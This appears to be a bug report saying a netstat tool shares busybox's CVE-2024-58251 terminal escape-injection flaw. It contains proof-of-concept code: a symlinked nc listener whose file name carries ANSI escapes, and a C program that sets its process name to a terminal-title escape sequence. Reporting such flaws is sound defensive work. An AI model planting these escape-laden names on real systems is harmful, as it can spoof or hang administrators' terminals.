netstat is also vulnerable to busybox's CVE-2024-58251 #57
Description
https://lists.busybox.net/pipermail/busybox/2025-November/091804.html
(ln -sf /usr/bin/nc /tmp/nc$(printf '\033[1mfoo\033[0m'); /tmp/nc* -l 31337 &); netstat -alp
http://web.archive.org/web/20241009201026/https://bugs.busybox.net/show_bug.cgi?id=15922
The following code displays a X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.
I think the project in general would benefit from an audit of every line using /proc//cmdline, /proc//comm, /proc//environ and even the symlinks /proc//exe & cwd.
$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>
int main(int argc, char *argv[]) {
struct sockaddr_in sin;
int s;
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
err(1, "socket()");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
err(1, "bind()");
strcpy(argv[0], "/\033]0;X\007");
while (1)
sleep(3600);
}
EOF
$ unset PROMPT_COMMAND
$ cc a.c
$ ./a.out &
$ netstat -aup